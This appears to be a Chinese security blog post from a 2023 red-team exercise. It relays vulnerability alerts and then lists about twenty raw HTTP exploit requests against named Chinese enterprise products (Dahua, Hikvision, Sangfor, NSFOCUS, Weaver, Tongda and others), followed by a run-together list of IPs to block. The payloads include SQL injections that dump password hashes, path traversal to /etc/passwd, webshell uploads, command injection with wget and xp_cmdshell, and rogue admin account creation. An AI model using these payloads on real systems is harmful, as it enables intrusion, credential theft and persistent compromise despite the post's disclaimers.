免责声明
今天是2023年8月11号周五,HW第三天,山重水复疑无路,柳暗花明又一村,告警多很吓人,告警少更吓人,好累哦!
“拿核弹打蚂蚁”,“继承去年nginx的传说”
运行就弹出计算器然后一个弹窗 你不小心被卫星了---by小艾
(PS:为啥叫漏洞情报,什么什么情报,就是通知一下,咱也不确定不是,能有个心理准备,不怕万一就怕一万,对吧!)
一、今日份漏洞情报
来自360HW情报
【演练实时消息】
【消息时间】:2023-08-11 09:55
【消息标题】:安恒明御运维审计与风险控制系统 xmlrpc.sock 任意用户添加漏洞
【消息详情】:360漏洞云监测到《安恒明御运维审计与风险控制系统 xmlrpc.sock 任意用户添加漏洞》消息,经漏洞云复核,确认为【真实】漏洞,漏洞影响【未知】,该漏洞标准化POC已经上传漏洞云情报平台,平台编号:360LDYLD-2023-00002528,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。
【演练实时消息】
【消息时间】:2023-08-11 10:00
【消息标题】:锐捷NBR路由器 fileupload.php 任意文件上传漏洞
【消息详情】:360漏洞云监测到《锐捷NBR路由器 fileupload.php 任意文件上传漏洞》消息,经漏洞云复核,确认为【真实】漏洞,漏洞影响【未知】,该漏洞标准化POC已经上传漏洞云情报平台,平台编号:360LDYLD-2023-00002533,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。
【演练实时消息】
【消息时间】:2023-08-11 10:30
【消息标题】:大华 DSS sendCustomerMsg 前台命令执行漏洞
【消息详情】:360漏洞云监测到《大华 DSS sendCustomerMsg 前台命令执行漏洞》消息,经漏洞云复核,确认为【真实】漏洞,漏洞影响【未知】,该漏洞POC已经上传漏洞云情报平台,平台编号:360LDYLD-2023-00002545,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。
【演练实时消息】
【消息时间】:2023-08-11 10:30
【消息标题】:大华智慧园区综合管理平台 searchJson SQL注入漏洞
【消息详情】:360漏洞云监测到《大华智慧园区综合管理平台 searchJson SQL注入漏洞》消息,经漏洞云复核,确认为【真实】漏洞,漏洞影响【未知】,该漏洞标准化POC已经上传漏洞云情报平台,平台编号:360LDYLD-2023-00002538,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。
【演练实时消息】
【消息时间】:2023-08-11 12:20
【消息标题】:大华智慧园区综合管理平台 video 文件上传漏洞
【消息详情】:360漏洞云监测到《大华智慧园区综合管理平台 video 文件上传漏洞》消息,经漏洞云复核,确认为【真实】漏洞,漏洞影响【未知】,该漏洞标准化POC已经上传漏洞云情报平台,平台编号:360LDYLD-2023-00002561,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。
【演练实时消息】
【消息时间】:2023-08-11 16:20
【消息标题】:海康威视 IVMS-8700平台 upload.action 文件上传漏洞
【消息详情】:360漏洞云监测到《海康威视 IVMS-8700平台 upload.action 文件上传漏洞》消息,经漏洞云复核,确认为【真实】漏洞,漏洞影响版本【未知】,该漏洞标准化POC已经上传漏洞云情报平台,平台编号:360LDYLD-2023-00002571,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。
来个免责声明哈,刚哥YYDS!请师傅们自行合法验证!
由于传播、利用作者所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
汉得SRM tomcat.jsp 登录绕过漏洞
/tomcat.jsp?dataName=role_id&dataValue=1/tomcat.jsp?dataName=user_id&dataValue=1然后访问后台:/main.screen
sxf-报表系统
POST /rep/login HTTP/1.1Host: URLCookie:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0s X 10.15: ry:109.0)Gecko/20100101 Firefox/115.0Accept:text/html,application/xhtml+xml,application/xml;g=0,9, image/avif, image/webp,*/*;q=0.8 Accept-Language:zh-CN, zh;g=0.8, zh-TW;g=0.7, zh-HK;g=0.5,en-US;g=0.3,en;g=0.2Accept-Encoding: gzip deflateUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache14 Te: trailersConnection: closeContent-Type:application/x-www-form-urlencodedContent-Length: 126 clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid -a %0A&userPsw=tmbhuisq
某盟sas安全审计系统任意文件读取漏洞
/webconf/GetFile/indexpath=../../../../../../../../../../../../../../etc/passwd某凌OA前台代码执行
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1Host: www.ynjd.cn:801User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept: /Connection: Keep-AliveContent-Length: 42Content-Type: application/x-www-form-urlencodedvar={"body":{"file":"file:///etc/passwd"}}
某联达oa sql注入漏洞
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1Host: xxx.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie:Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 88dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
某达OA sql注入漏洞
GET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1HTTP/1.1Host:127.0.0.1:8080User-Agent: Mozilla/5.0(Windows NT10.0; Win64; x64; rv:109.0) Gecko/20100101Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests:1
某x服应用交付系统命令执行漏洞
POST /rep/loginHost:10.10.10.1:85clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123
某信景云终端安全管理系统 login SQL注入漏洞
POST /api/user/logincaptcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='
某恒明御运维审计与风险控制系统堡垒机任意用户注册
POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1Host: xxxCookie: LANG=zh; USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848Cache-Control: max-age=0Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 1121<methodCall><methodName>web.user_add</methodName><params><param><value><array><data><value><string>admin</string></value><value><string>5</string></value><value><string>XX.XX.XX.XX</string></value></data></array></value></param><param><value><struct><member><name>uname</name><value><string>deptadmin</string></value></member><member><name>name</name><value><string>deptadmin</string></value></member><member><name>pwd</name><value><string>Deptadmin@123</string></value></member><member><name>authmode</name><value><string>1</string></value></member><member><name>deptid</name><value><string></string></value></member><member><name></name><value><string></string></value></member><member><name>mobile</name><value><string></string></value></member><member><name>comment</name><value><string></string></value></member><member><name>roleid</name><value><string>101</string></value></member></struct></value></param></params></methodCall>
HiKVISION 综合安防管理平台 report 任意文件上传漏洞
POST /svm/api/external/report HTTP/1.1Host:10.10.10.10Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a------WebKitFormBoundary9PggsiM755PLa54aContent-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"Content-Type: application/zip<%jsp的马%>------WebKitFormBoundary9PggsiM755PLa54a--马儿路径:/portal/ui/login/..;/..;/new.jsp
HiKVISION 综合安防管理平台 files 任意文件上传漏洞
POST /center/api/files;.html HTTP/1.1Host: 10.10.10.10Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a------WebKitFormBoundary9PggsiM755PLa54aContent-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"Content-Type: application/zip<%jsp的马%>------WebKitFormBoundary9PggsiM755PLa54a--
某微 E-Cology 某版本 SQL注入漏洞
POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36Connection: closeContent-Length: 189Content-Type: text/plainAccept-Encoding: gzipcallCount=1page=httpSessionId=scriptSessionId=c0-scriptName=DocDwrUtilc0-methodName=ifNewsCheckOutByCurrentUserc0-id=0c0-param0=string:1 AND 1=1c0-param1=string:1batchId=0
某和OA C6-GetSqlData.aspx SQL注入漏洞
POST /C6/Control/GetSqlData.aspx/.ashxHost: ip:portUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36Connection: closeContent-Length: 189Content-Type: text/plainAccept-Encoding: gzipexec master..xp_cmdshell 'ipconfig'
大华智慧园区综合管理平台 searchJson SQL注入漏洞
GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1Host:127.0.0.1:7443User-Agent: Mozilla/5.0(Macintosh; Intel Mac OS X10_14_3) AppleWebKit/605.1.15(KHTML, like Gecko) Version/12.0.3Safari/605.1.15Accept-Encoding: gzip, deflateConnection:close
大华智慧园区综合管理平台 文件上传漏洞
POST /publishing/publishing/material/file/video HTTP/1.1Host:127.0.0.1:7443User-Agent: Mozilla/5.0(Macintosh; Intel Mac OS X10_14_3) AppleWebKit/605.1.15(KHTML, like Gecko) Version/12.0.3Safari/605.1.15Content-Length:804Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7Accept-Encoding: gzip, deflateConnection: close--dd8f988919484abab3816881c55272a7Content-Disposition: form-data; name="Filedata"; filename="0EaE10E7dF5F10C2.jsp"<%contentType="text/html; charset=GBK"%><%import="java.math.BigInteger"%><%import="java.security.MessageDigest"%><% MessageDigest md5 =null;md5 = MessageDigest.getInstance("MD5");Strings ="123456";Stringmiyao ="";Stringjiamichuan = s + miyao;md5.update(jiamichuan.getBytes());Stringmd5String =newBigInteger(1, md5.digest()).toString(16);out.println(md5String);newjava.io.File(application.getRealPath(request.getServletPath())).delete();%>--dd8f988919484abab3816881c55272a7Content-Disposition: form-data; name="poc"poc--dd8f988919484abab3816881c55272a7Content-Disposition: form-data; name="Submit"submit--dd8f988919484abab3816881c55272a7--
某友时空KSOA PayBill SQL注入漏洞
POST /servlet/PayBill?caculate&_rnd= HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 134Accept-Encoding: gzip, deflateConnection: close<root><name>1</name><name>1'WAITFOR DELAY '00:00:03';-</name><name>1</name><name>102360</name></root>
某盟 SAS堡垒机 local_user.php 任意用户登录漏洞
GET/api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=adminHTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzip, deflateConnection: close
某盟 SAS堡垒机 GetFile 任意文件读取漏洞
GET/api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=adminHTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateConnection: close
某盟 SAS堡垒机 Exec 远程命令执行漏洞
GET/webconf/Exec/index?cmd=wget%20xxx.xxx.xxxHTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateConnection: close
某微E-Office9文件上传漏洞
POST /inc/jquery/uploadify/uploadify.php HTTP/1.1Host: 192.168.233.10:8082User-Agent: testConnection: closeContent-Length: 493Accept-Encoding: gzipContent-Type: multipart/form-data------WebKitFormBoundarydRVCGWq4Cx3Sq6ttContent-Disposition: form-data; name="Filedata"; filename="666.php"Content-Type: application/octet-stream<?php phpinfo();?>------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
注意事项!!!!!:::::仅供参考以及验证自己系统是否存在漏洞并且加固,请勿用于违法行为,否则与本作者无关!!!!
详情请看,不过这个人家360已经知道了,正在优化后面不能用了
二、恶意IP(建议封禁)
来源:知道创宇安全智脑,微步情报社区,CT情报,以及本小弟收集
(有师傅反馈,可能有重复的,这个我发现确实无法避免哈哈哈)
217.198.212.16262.233.50.179167.94.138.107167.248.133.129178.62.6.239185.180.143.18185.180.143.14145.95.146.7746.32.172.8880.82.65.2018.219.119.144139.162.177.14739.162.177.147147.139.78.14447.243.6.177223.104.194.1298.219.119.144162.142.125.129185.189.182.234107.170.225.15185.189.182.23467.94.138.10085.189.182.234221.2.36.250223.4.74.93124.70.30.150115.198.200.1047.115.218.668.218.77.79211.46.18.145.79.181.17943.136.40.25261.52.2.34124.225.80.200123.193.240.13121.224.79.774.82.47.46162.142.125.139193.163.125.165112.17.79.156170.64.134.8931.220.1.83123.56.22.106101.200.156.14247.93.99.20047.94.105.22347.96.104.3231.220.1.8374.82.47.5184.105.247.207137.184.105.19262.233.50.179111.7.96.156111.7.100.31211.95.50.8111.7.96.152167.94.138.111创宇恶意IP198.235.24.220198.235.24.216141.98.6.73205.210.31.180198.235.24.230205.210.31.80205.210.31.242198.235.24.234205.210.31.71205.210.31.83205.210.31.215198.235.24.184205.210.31.47205.210.31.253205.210.31.230205.210.31.65205.210.31.217198.235.24.240205.210.31.197205.210.31.104198.235.24.198205.210.31.74198.235.24.213198.235.24.239205.210.31.137205.210.31.255205.210.31.239205.210.31.175205.210.31.254198.235.24.228205.210.31.106205.210.31.226198.235.24.176198.235.24.243205.210.31.195198.235.24.229205.210.31.86205.210.31.196198.235.24.200198.235.24.202205.210.31.178198.235.24.244205.210.31.181198.235.24.219205.210.31.89205.210.31.78205.210.31.85198.235.24.175205.210.31.162205.210.31.3205.210.31.194205.210.31.183113.219.160.192205.210.31.214198.235.24.193205.210.31.105198.235.24.166205.210.31.213198.235.24.241205.210.31.206205.210.31.203205.210.31.235198.235.24.183205.210.31.199198.235.24.252205.210.31.95205.210.31.68198.235.24.182198.235.24.152205.210.31.72205.210.31.36205.210.31.52185.191.171.4205.210.31.93205.210.31.204205.210.31.186205.210.31.172198.235.24.249113.219.160.191205.210.31.108205.210.31.169198.235.24.206205.210.31.88205.210.31.232205.210.31.245205.210.31.163205.210.31.7634.70.155.212205.210.31.201198.235.24.214205.210.31.66198.235.24.192205.210.31.218205.210.31.236198.235.24.194198.235.24.236198.235.24.225205.210.31.229198.235.24.180205.210.31.69205.210.31.192205.210.31.240205.210.31.244205.210.31.212205.210.31.164198.235.24.170205.210.31.129205.210.31.210205.210.31.149198.235.24.255205.210.31.221205.210.31.171205.210.31.227205.210.31.202205.210.31.248205.210.31.37205.210.31.67205.210.31.233198.235.24.215205.210.31.79171.212.116.210205.210.31.98198.235.24.232205.210.31.234205.210.31.165205.210.31.92205.210.31.87205.210.31.60205.210.31.231198.235.24.177198.235.24.223205.210.31.193198.235.24.162205.210.31.102198.235.24.24514.36.39.7198.235.24.164205.210.31.103205.210.31.51205.210.31.99198.235.24.247198.235.24.208205.210.31.70205.210.31.222103.231.172.146205.210.31.64198.235.24.209205.210.31.96216.244.66.247205.210.31.110
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论